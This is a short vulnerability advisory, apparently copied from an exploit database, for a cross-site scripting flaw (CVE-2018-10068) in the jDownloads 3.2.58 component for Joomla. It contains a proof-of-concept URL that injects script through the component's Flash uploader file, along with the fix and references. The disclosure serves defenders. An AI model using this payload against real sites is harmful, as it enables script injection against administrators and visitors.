36 lines
No EOL
1.2 KiB
Text
36 lines
No EOL
1.2 KiB
Text
#######################################
|
|
# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
|
|
# Google Dork: N/A
|
|
# Date: 14-04-2018
|
|
#######################################
|
|
# Exploit Author: Sureshbabu Narvaneni#
|
|
#######################################
|
|
# Author Blog : http://nullnews.in
|
|
# Vendor Homepage: http://www.jdownloads.com/
|
|
# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
|
|
# Affected Version: 3.2.58
|
|
# Category: WebApps
|
|
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
|
|
# CVE : CVE-2018-10068
|
|
#
|
|
# 1. Vendor Description:
|
|
#
|
|
# Exclusive Download manager for Joomla!
|
|
#
|
|
# 2. Technical Description:
|
|
#
|
|
# Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.
|
|
#
|
|
# 3. Proof Of Concept:
|
|
#
|
|
http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
|
|
#
|
|
# 4. Solution:
|
|
#
|
|
# Upgrade to latest release.
|
|
# https://extensions.joomla.org/extension/jdownloads/
|
|
#
|
|
# 5. Reference:
|
|
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
|
|
# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
|
|
##################################### |